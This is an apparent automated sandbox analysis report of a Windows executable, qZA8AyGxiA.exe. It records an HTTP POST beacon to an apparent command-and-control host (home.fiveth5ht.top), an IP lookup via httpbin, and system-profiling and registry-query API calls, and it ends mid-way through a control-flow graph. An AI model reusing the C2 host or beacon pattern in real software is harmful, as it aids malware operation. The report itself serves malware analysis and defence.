                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                          Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          2192.168.2.6497535.101.3.217801460C:\Users\user\Desktop\qZA8AyGxiA.exe
                                          TimestampBytes transferredDirectionData
                                          Dec 27, 2024 08:55:45.456326962 CET171OUTPOST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                          Host: home.fiveth5ht.top
                                          Accept: */*
                                          Content-Type: application/json
                                          Content-Length: 31
                                          Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                          Data Ascii: { "id1": "0", "data": "Done1" }
                                          Dec 27, 2024 08:55:47.076733112 CET372INHTTP/1.1 404 NOT FOUND
                                          Server: nginx/1.22.1
                                          Date: Fri, 27 Dec 2024 07:55:46 GMT
                                          Content-Type: text/html; charset=utf-8
                                          Content-Length: 207
                                          Connection: close
                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                          Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                          HTTPS Proxied Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.6497243.218.7.1034431460C:\Users\user\Desktop\qZA8AyGxiA.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-27 07:55:35 UTC52OUTGET /ip HTTP/1.1
                                          Host: httpbin.org
                                          Accept: */*
                                          2024-12-27 07:55:36 UTC224INHTTP/1.1 200 OK
                                          Date: Fri, 27 Dec 2024 07:55:36 GMT
                                          Content-Type: application/json
                                          Content-Length: 31
                                          Connection: close
                                          Server: gunicorn/19.9.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Credentials: true
                                          2024-12-27 07:55:36 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                          Data Ascii: { "origin": "8.46.123.189"}


                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:02:55:28
                                          Start date:27/12/2024
                                          Path:C:\Users\user\Desktop\qZA8AyGxiA.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\qZA8AyGxiA.exe"
                                          Imagebase:0x8a0000
                                          File size:4'508'672 bytes
                                          MD5 hash:75F83958DC211DDD4DFED631AED3AAFA
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          Disassembly

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:2.5%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:17.4%
                                            Total number of Nodes:454
                                            Total number of Limit Nodes:74
                                            execution_graph 55349 d2f250 55350 d2f282 55349->55350 55351 d2f28e 55350->55351 55354 c28f70 55350->55354 55353 d2f297 55361 c28e90 _open 55354->55361 55356 c28f82 55357 c28e90 _open 55356->55357 55358 c28fa2 55357->55358 55359 c28f70 _open 55358->55359 55360 c28fb8 55359->55360 55360->55353 55362 c28eba 55361->55362 55362->55356 55796 d27830 55797 d2785a 55796->55797 55798 d27866 55797->55798 55799 c28f70 _open 55797->55799 55800 d2786f 55799->55800 55806 c312c0 55800->55806 55803 d278a6 55804 c28f70 _open 55805 d278af 55804->55805 55807 c312cc 55806->55807 55810 c2e050 55807->55810 55809 c312fa 55809->55803 55809->55804 55813 c2e09d 55810->55813 55811 c2e18e 55811->55809 55812 c2feb6 isxdigit 55812->55813 55813->55811 55813->55812 55363 8a13c9 55365 8a1160 55363->55365 55368 8a13a1 55365->55368 55369 c293e0 55365->55369 55379 c28a20 _open isxdigit 55365->55379 55367 8a1231 SetUnhandledExceptionFilter 55367->55365 55370 c293f3 55369->55370 55376 c29400 55369->55376 55370->55367 55371 c29688 55371->55370 55372 c296c7 55371->55372 55380 c29280 vfprintf 55371->55380 55381 c29220 vfprintf 55372->55381 55375 c296df 55375->55367 55376->55370 55376->55371 55376->55372 55377 c29280 vfprintf 55376->55377 55378 c29220 vfprintf 55376->55378 55377->55376 55378->55376 55379->55365 55380->55371 55381->55375 55814 8bd5e0 55815 8bd652 WSAStartup 55814->55815 55817 8bd5f0 55814->55817 55815->55817 55818 8bd664 55815->55818 55819 8bd67c 55817->55819 55821 8bd690 _open 55817->55821 55820 8bd5fa 55821->55820 55382 8db3c0 55383 8db3ee 55382->55383 55384 8db3cb 55382->55384 55388 8a76a0 55384->55388 55399 8d9290 55384->55399 55385 8db3ea 55389 8a76c0 55388->55389 55390 8a76e6 send 55388->55390 55389->55390 55391 8a76c9 55389->55391 55392 8a76d3 55390->55392 55398 8a7704 55390->55398 55391->55392 55393 8a770b 55391->55393 55413 8a72a0 _open 55392->55413 55414 8a72a0 _open 55393->55414 55396 8a771c 55415 8acb20 _open 55396->55415 55398->55385 55400 8a76a0 2 API calls 55399->55400 55401 8d92e5 55400->55401 55402 8d93c3 55401->55402 55404 8d92f3 55401->55404 55407 8d9392 55402->55407 55416 8bd090 _open 55402->55416 55403 8d93be 55403->55385 55404->55407 55408 8d9335 WSAIoctl 55404->55408 55406 8d93f7 55417 8e4f40 _open 55406->55417 55407->55403 55418 8e50a0 _open 55407->55418 55408->55407 55411 8d9366 55408->55411 55411->55407 55412 8d9371 setsockopt 55411->55412 55412->55407 55413->55398 55414->55396 55415->55398 55416->55406 55417->55407 55418->55403 55419 8de400 55420 8de412 55419->55420 55422 8de459 55419->55422 55421 8de422 55420->55421 55443 8f3030 _open 55420->55443 55444 9009d0 _open 55421->55444 55427 8de4a8 55422->55427 55430 8de495 55422->55430 55431 8db5a0 55422->55431 55425 8de42b 55445 8d68b0 closesocket _open 55425->55445 55429 8db5a0 _open 55429->55427 55430->55427 55430->55429 55432 8db5d2 55431->55432 55433 8db5c0 55431->55433 55432->55430 55433->55432 55434 8db713 55433->55434 55437 8db626 55433->55437 55447 8e4f40 _open 55434->55447 55436 8db65a 55436->55432 55438 8db72b 55436->55438 55439 8db737 55436->55439 55437->55432 55437->55436 55437->55438 55437->55439 55446 8e50a0 _open 55437->55446 55438->55432 55448 8e50a0 _open 55438->55448 55439->55432 55449 8e50a0 _open 55439->55449 55443->55421 55444->55425 55445->55422 55446->55437 55447->55432 55448->55432 55449->55432 55450 8db400 55451 8db40b 55450->55451 55452 8db425 55450->55452 55455 8a7770 55451->55455 55453 8db421 55456 8a7790 55455->55456 55457 8a77b6 recv 55455->55457 55456->55457 55458 8a7799 55456->55458 55459 8a77a3 55457->55459 55465 8a77d4 55457->55465 55458->55459 55460 8a77db 55458->55460 55466 8a72a0 _open 55459->55466 55467 8a72a0 _open 55460->55467 55463 8a77ec 55468 8acb20 _open 55463->55468 55465->55453 55466->55465 55467->55463 55468->55465 55469 8df100 55471 8df11f 55469->55471 55490 8df1b8 55469->55490 55470 8dff1a 55514 8e0c80 _open 55470->55514 55473 8df2a3 55471->55473 55477 8df5b9 55471->55477 55483 8df240 55471->55483 55471->55490 55501 8e4f40 _open 55473->55501 55475 8e0045 55476 8e004d 55475->55476 55480 8e010d 55475->55480 55475->55490 55517 8e50a0 _open 55475->55517 55520 8e4f40 _open 55476->55520 55477->55470 55477->55475 55485 8e008a 55477->55485 55486 8df80d 55477->55486 55496 8e0d30 _open 55477->55496 55498 8e50a0 _open 55477->55498 55513 8e4fd0 _open 55477->55513 55478 8dff5b 55478->55490 55515 8e50a0 _open 55478->55515 55482 8e015e 55480->55482 55518 8e50a0 _open 55480->55518 55482->55476 55519 8e50a0 _open 55482->55519 55483->55490 55502 8a7310 55483->55502 55516 8e4f40 _open 55485->55516 55492 8df491 55492->55477 55494 8a7310 _open 55492->55494 55499 8df50d 55494->55499 55495 8df3ce 55495->55490 55495->55492 55511 8e50a0 _open 55495->55511 55496->55477 55498->55477 55499->55477 55499->55490 55512 8e50a0 _open 55499->55512 55501->55490 55503 8a7320 55502->55503 55508 8a7332 55502->55508 55504 8a7390 55503->55504 55503->55508 55522 8a72a0 _open 55504->55522 55506 8a73a1 55523 8acb20 _open 55506->55523 55507 8a7380 55507->55495 55508->55507 55521 8a72a0 _open 55508->55521 55511->55492 55512->55477 55513->55477 55514->55478 55515->55490 55516->55490 55517->55480 55518->55482 55519->55476 55520->55490 55521->55507 55522->55506 55523->55507 55524 8e0700 55528 8e0719 55524->55528 55535 8e099d 55524->55535 55525 8a7310 _open 55525->55528 55527 8e09f6 55543 8a75a0 55527->55543 55528->55525 55528->55527 55529 8e09b5 55528->55529 55530 8e0a35 55528->55530 55528->55535 55539 8ceb30 _open 55528->55539 55540 9013a0 _open 55528->55540 55541 8ceae0 _open 55528->55541 55529->55535 55542 8e50a0 _open 55529->55542 55547 8e4f40 _open 55530->55547 55537 8a75a0 _open 55537->55535 55539->55528 55540->55528 55541->55528 55542->55535 55544 8a75aa 55543->55544 55545 8a75d1 55543->55545 55544->55545 55548 8a72a0 _open 55544->55548 55545->55537 55547->55535 55548->55545 55822 8b1139 55823 8b1148 55822->55823 55824 8b1512 55823->55824 55827 8b1161 55823->55827 55826 8b0f00 55824->55826 55835 8b22d0 _open 55824->55835 55825 8b0150 _open 55825->55826 55826->55825 55831 8b0f7b 55826->55831 55832 8a75a0 _open 55826->55832 55836 8dd4d0 _open 55826->55836 55837 8b4940 _open 55826->55837 55827->55826 55834 8b0150 _open 55827->55834 55832->55826 55834->55826 55835->55826 55836->55826 55837->55826 55549 8a3d5e 55552 8a3d30 55549->55552 55551 8a3d90 55552->55549 55552->55551 55553 8b0ab0 55552->55553 55556 8b05b0 55553->55556 55557 8b05bd 55556->55557 55561 8b07c7 55556->55561 55560 8b066a 55557->55560 55557->55561 55569 8b07ce 55557->55569 55577 8b03c0 _open 55557->55577 55578 8b7450 _open 55557->55578 55567 8b06f0 55560->55567 55560->55569 55579 8b73b0 _open 55560->55579 55561->55552 55564 8b0707 WSAEventSelect 55564->55567 55564->55569 55565 8b07ef 55565->55569 55572 8b0847 55565->55572 55573 8b6fa0 55565->55573 55567->55564 55567->55565 55568 8a76a0 2 API calls 55567->55568 55568->55567 55580 8b7380 _open 55569->55580 55570 8b09e8 WSAEnumNetworkEvents 55571 8b09d0 WSAEventSelect 55570->55571 55570->55572 55571->55570 55571->55572 55572->55569 55572->55570 55572->55571 55574 8b6fd4 55573->55574 55576 8b6feb 55573->55576 55575 8b7207 select 55574->55575 55574->55576 55575->55576 55576->55572 55577->55557 55578->55557 55579->55560 55580->55561 55838 9570a0 55839 9570ae 55838->55839 55841 95717f 55839->55841 55844 9571a7 55839->55844 55845 96a8c0 55839->55845 55849 9571c0 socket ioctlsocket connect getsockname 55839->55849 55841->55844 55850 969320 closesocket 55841->55850 55846 96a8e6 55845->55846 55847 96a903 recvfrom 55845->55847 55846->55847 55848 96a8ed 55846->55848 55847->55848 55848->55839 55849->55839 55850->55844 55851 8a29ff FindFirstFileA 55852 8a2a31 55851->55852 55853 8a2a5c RegOpenKeyExA 55852->55853 55854 8a2a93 55853->55854 55855 8a2ade CharUpperA 55854->55855 55857 8a2b0a 55855->55857 55856 8a2bf9 QueryFullProcessImageNameA 55858 8a2c3b CloseHandle 55856->55858 55857->55856 55860 8a2c64 55858->55860 55859 8a2df1 CloseHandle 55861 8a2e23 55859->55861 55860->55859 55862 954720 55863 954728 55862->55863 55864 954733 55863->55864 55871 95476c 55863->55871 55872 959270 55863->55872 55866 954774 55868 954860 55875 954950 55868->55875 55870 954878 55871->55870 55881 9530a0 closesocket 55871->55881 55882 95a440 55872->55882 55874 959297 55874->55868 55876 954966 55875->55876 55879 9549c5 55876->55879 55880 9549b9 55876->55880 55913 95b590 if_indextoname 55876->55913 55878 954aa0 gethostname 55878->55879 55878->55880 55879->55871 55880->55878 55880->55879 55881->55866 55884 95a46b 55882->55884 55883 95aa03 RegOpenKeyExA 55885 95aa27 RegQueryValueExA 55883->55885 55886 95ab70 RegOpenKeyExA 55883->55886 55909 95a794 GetBestRoute2 55884->55909 55910 95a6c7 GetBestRoute2 55884->55910 55911 95a4db 55884->55911 55888 95aa71 55885->55888 55889 95aacc RegQueryValueExA 55885->55889 55887 95ac34 RegOpenKeyExA 55886->55887 55900 95ab90 55886->55900 55890 95acf8 RegOpenKeyExA 55887->55890 55905 95ac54 55887->55905 55888->55889 55894 95aa85 RegQueryValueExA 55888->55894 55891 95ab66 RegCloseKey 55889->55891 55892 95ab0e 55889->55892 55893 95ad56 RegEnumKeyExA 55890->55893 55895 95ad14 55890->55895 55891->55886 55892->55891 55898 95ab1e RegQueryValueExA 55892->55898 55893->55895 55896 95ad9b 55893->55896 55897 95aab3 55894->55897 55895->55874 55899 95ae16 RegOpenKeyExA 55896->55899 55897->55889 55903 95ab4c 55898->55903 55901 95ae34 RegQueryValueExA 55899->55901 55902 95addf RegEnumKeyExA 55899->55902 55900->55887 55904 95af43 RegQueryValueExA 55901->55904 55912 95adaa 55901->55912 55902->55895 55902->55899 55903->55891 55906 95b052 RegQueryValueExA 55904->55906 55904->55912 55905->55890 55907 95adc7 RegCloseKey 55906->55907 55906->55912 55907->55902 55908 95afa0 RegQueryValueExA 55908->55912 55909->55884 55910->55884 55911->55883 55911->55895 55912->55904 55912->55906 55912->55907 55912->55908 55913->55880 55581 96a080 55584 969740 55581->55584 55583 96a09b 55585 969780 55584->55585 55589 96975d 55584->55589 55586 969925 RegOpenKeyExA 55585->55586 55585->55589 55587 96995a RegQueryValueExA 55586->55587 55586->55589 55588 969986 RegCloseKey 55587->55588 55588->55589 55589->55583 55590 96b180 55591 96b2e3 55590->55591 55592 96b19b 55590->55592 55592->55591 55595 96b2a9 getsockname 55592->55595 55597 96b020 closesocket 55592->55597 55598 96af30 55592->55598 55602 96b060 55592->55602 55607 96b020 55595->55607 55597->55592 55599 96af63 socket 55598->55599 55600 96af4c 55598->55600 55599->55592 55600->55599 55601 96af52 55600->55601 55601->55592 55606 96b080 55602->55606 55603 96b0b0 connect 55604 96b0bf WSAGetLastError 55603->55604 55605 96b0ea 55604->55605 55604->55606 55605->55592 55606->55603 55606->55604 55606->55605 55608 96b052 55607->55608 55609 96b029 55607->55609 55608->55592 55610 96b04b closesocket 55609->55610 55611 96b03e 55609->55611 55610->55608 55611->55592 55914 96a920 55915 96a944 55914->55915 55916 96a977 send 55915->55916 55917 96a94b 55915->55917 55612 8a255d 55613 c29f70 55612->55613 55614 8a256c GetSystemInfo 55613->55614 55615 8a2589 55614->55615 55616 8a25a0 GlobalMemoryStatusEx 55615->55616 55617 8a25ec 55616->55617 55618 8a263c GetDriveTypeA 55617->55618 55619 8a2762 55617->55619 55618->55617 55620 8a2655 GetDiskFreeSpaceExA 55618->55620 55621 8a27d6 KiUserCallbackDispatcher 55619->55621 55620->55617 55622 8a27f8 55621->55622 55623 8a28d9 FindFirstFileW 55622->55623 55624 8a2906 FindNextFileW 55623->55624 55625 8a2928 55623->55625 55624->55624 55624->55625 55626 8a31d7 55629 8a31f4 55626->55629 55627 8a3200 55628 8a32dc CloseHandle 55628->55627 55629->55627 55629->55628 55630 8a2f17 55638 8a2f2c 55630->55638 55631 8a31d3 55632 8a2fb3 RegOpenKeyExA 55632->55638 55633 8a315c RegEnumKeyExA 55634 8a31b2 RegCloseKey 55633->55634 55633->55638 55634->55638 55635 8a3046 RegOpenKeyExA 55636 8a3089 RegQueryValueExA 55635->55636 55635->55638 55637 8a313b RegCloseKey 55636->55637 55636->55638 55637->55638 55638->55631 55638->55632 55638->55633 55638->55635 55638->55637 55639 8d8b50 55640 8d8b6b 55639->55640 55668 8d8be6 55639->55668 55641 8d8b8f 55640->55641 55642 8d8bf3 55640->55642 55640->55668 55741 8b6e40 select 55641->55741 55672 8da550 55642->55672 55646 8d8cd9 SleepEx 55655 8d8d13 55646->55655 55647 8d8e85 55651 8d8eae 55647->55651 55647->55668 55747 8b2a00 _open 55647->55747 55648 8d8c1f connect 55649 8d8c35 55648->55649 55729 8da150 55649->55729 55650 8da150 2 API calls 55660 8d8dff 55650->55660 55651->55668 55748 8a78b0 closesocket 55651->55748 55652 8d8cb2 55652->55647 55652->55650 55652->55668 55655->55652 55656 8d8d43 55655->55656 55664 8da150 2 API calls 55656->55664 55658 8d8bb5 55658->55668 55743 8e50a0 _open 55658->55743 55659 8d8c8b 55662 8d8ba1 55659->55662 55663 8d8dc8 55659->55663 55660->55647 55745 8bd090 _open 55660->55745 55662->55646 55662->55652 55662->55658 55744 8db100 _open 55663->55744 55664->55658 55667 8d8e67 55746 8e4fd0 _open 55667->55746 55673 8da575 55672->55673 55677 8da597 55673->55677 55752 8a75e0 55673->55752 55676 8da709 55679 8a78b0 2 API calls 55676->55679 55687 8da713 55676->55687 55723 8da6d9 55677->55723 55764 8def30 55677->55764 55678 8da63a 55683 8da641 55678->55683 55688 8da69b 55678->55688 55679->55687 55680 8d8bfc 55680->55648 55680->55649 55680->55652 55680->55668 55682 8da7e5 55686 8da811 setsockopt 55682->55686 55692 8da87c 55682->55692 55702 8da8ee 55682->55702 55683->55682 55773 8e4fd0 _open 55683->55773 55686->55692 55694 8da83b 55686->55694 55687->55680 55772 8e50a0 _open 55687->55772 55769 8bd090 _open 55688->55769 55690 8da6c9 55770 8e4f40 _open 55690->55770 55692->55702 55776 8db1e0 _open 55692->55776 55694->55692 55774 8bd090 _open 55694->55774 55697 8daf56 55698 8daf5d 55697->55698 55697->55723 55698->55687 55701 8da150 2 API calls 55698->55701 55699 8da86d 55775 8e4fd0 _open 55699->55775 55701->55687 55703 8dabb9 55702->55703 55705 8dacb8 55702->55705 55706 8dae32 55702->55706 55713 8daf33 55702->55713 55719 8dabe1 55702->55719 55702->55723 55708 8dad45 55703->55708 55710 8dade6 55703->55710 55703->55719 55778 8d6be0 select closesocket _open 55703->55778 55704 8db056 55786 8bd090 _open 55704->55786 55705->55703 55715 8dacdc 55705->55715 55705->55723 55706->55703 55783 8e4fd0 _open 55706->55783 55707 8daf03 55707->55713 55784 8e4fd0 _open 55707->55784 55708->55710 55720 8dad5f 55708->55720 55781 8bd090 _open 55710->55781 55768 9067e0 ioctlsocket 55713->55768 55777 8bd090 _open 55715->55777 55717 8db07b 55787 8e4f40 _open 55717->55787 55719->55704 55719->55707 55719->55723 55785 8e4fd0 _open 55719->55785 55721 8dadb7 55720->55721 55779 8e4fd0 _open 55720->55779 55780 8f3030 _open 55721->55780 55723->55676 55723->55687 55771 8b2a00 _open 55723->55771 55726 8dad01 55782 8e4f40 _open 55726->55782 55730 8da15f 55729->55730 55739 8d8c4d 55729->55739 55731 8da181 getsockname 55730->55731 55730->55739 55732 8da1f7 55731->55732 55733 8da1d0 55731->55733 55734 8def30 _open 55732->55734 55792 8bd090 _open 55733->55792 55737 8da20f 55734->55737 55736 8da1eb 55794 8e4f40 _open 55736->55794 55737->55739 55793 8bd090 _open 55737->55793 55739->55659 55742 8e50a0 _open 55739->55742 55741->55662 55742->55659 55743->55668 55744->55652 55745->55667 55746->55647 55747->55651 55749 8a78d7 55748->55749 55750 8a78c5 55748->55750 55749->55668 55795 8a72a0 _open 55750->55795 55753 8a75ef 55752->55753 55754 8a7607 socket 55752->55754 55753->55754 55757 8a7643 55753->55757 55758 8a7601 55753->55758 55755 8a762b 55754->55755 55756 8a763a 55754->55756 55788 8a72a0 _open 55755->55788 55756->55677 55789 8a72a0 _open 55757->55789 55758->55754 55761 8a7654 55790 8acb20 _open 55761->55790 55763 8a7674 55763->55677 55765 8defa8 55764->55765 55767 8def47 55764->55767 55765->55767 55791 8ac960 _open 55765->55791 55767->55678 55768->55697 55769->55690 55770->55723 55771->55676 55772->55680 55773->55682 55774->55699 55775->55692 55776->55702 55777->55726 55778->55708 55779->55721 55780->55719 55781->55726 55782->55723 55783->55703 55784->55713 55785->55719 55786->55717 55787->55723 55788->55756 55789->55761 55790->55763 55791->55767 55792->55736 55793->55736 55794->55739 55795->55749 55918 8d95b0 55919 8d95c8 55918->55919 55920 8d95fd 55918->55920 55919->55920 55921 8da150 2 API calls 55919->55921 55921->55920

                                            Executed Functions

                                            Function 008DF100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                            • API String ID: 0-1590685507
                                            • Opcode ID: dfbc3dcc29f4b4cca8282c24c419d1780556f7bcc541c49f6c39f53ee5bedbe9
                                            • Instruction ID: 70e1517da8f4f65406b57e4632a51faa166d16a4c9f264e5ffc3b9b1e0977f68
                                            • Opcode Fuzzy Hash: dfbc3dcc29f4b4cca8282c24c419d1780556f7bcc541c49f6c39f53ee5bedbe9
                                            • Instruction Fuzzy Hash: C8C29D31A043449FD714CF29C484B6AB7E1FF85318F098A6AED99DB352D770E984DB82
                                            Function 008A255D Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 282fileCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • GetSystemInfo.KERNELBASE ref: 008A2579
                                            • GlobalMemoryStatusEx.KERNELBASE ref: 008A25CC
                                            • GetDriveTypeA.KERNELBASE ref: 008A2647
                                            • GetDiskFreeSpaceExA.KERNELBASE ref: 008A267E
                                            • KiUserCallbackDispatcher.NTDLL ref: 008A27E2
                                            • FindFirstFileW.KERNELBASE ref: 008A28F8
                                            • FindNextFileW.KERNELBASE ref: 008A291F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                            • String ID: @$`
                                            • API String ID: 3271271169-3318628307
                                            • Opcode ID: b7705bcc9a7b078e309d6f59daa6bd2cec087b8daa9817af13cb3fefc0b87666
                                            • Instruction ID: 68604fd4b2d532eee546536403f2bb0e463becfeca0acdf60bd5aeb38518e8b9
                                            • Opcode Fuzzy Hash: b7705bcc9a7b078e309d6f59daa6bd2cec087b8daa9817af13cb3fefc0b87666
                                            • Instruction Fuzzy Hash: 3CD1D5B49093189FCB10EF68D59569EBBF0FF84354F008869E898D7311E7349A84DF92
                                            Function 008A29FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321registryfileCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1268 8a29ff-8a2a2f FindFirstFileA 1269 8a2a38 1268->1269 1270 8a2a31-8a2a36 1268->1270 1271 8a2a3d-8a2a91 call d29c50 call d29ce0 RegOpenKeyExA 1269->1271 1270->1271 1276 8a2a9a 1271->1276 1277 8a2a93-8a2a98 1271->1277 1278 8a2a9f-8a2b0c call d29c50 call d29ce0 CharUpperA call c28da0 1276->1278 1277->1278 1286 8a2b0e-8a2b13 1278->1286 1287 8a2b15 1278->1287 1288 8a2b1a-8a2b92 call d29c50 call d29ce0 call c28e80 call c28e70 1286->1288 1287->1288 1297 8a2bcc-8a2c66 QueryFullProcessImageNameA CloseHandle call c28da0 1288->1297 1298 8a2b94-8a2ba3 1288->1298 1308 8a2c68-8a2c6d 1297->1308 1309 8a2c6f 1297->1309 1301 8a2bb0-8a2bc0 call c28e68 1298->1301 1302 8a2ba5-8a2bae 1298->1302 1306 8a2bc5-8a2bca 1301->1306 1302->1297 1306->1297 1306->1298 1310 8a2c74-8a2ce9 call d29c50 call d29ce0 call c28e80 call c28e70 1308->1310 1309->1310 1319 8a2dcf-8a2e1c call d29c50 call d29ce0 CloseHandle 1310->1319 1320 8a2cef-8a2d49 call c28bb0 call c28da0 1310->1320 1330 8a2e23-8a2e2e 1319->1330 1331 8a2d4b-8a2d63 call c28da0 1320->1331 1332 8a2d99-8a2dad 1320->1332 1333 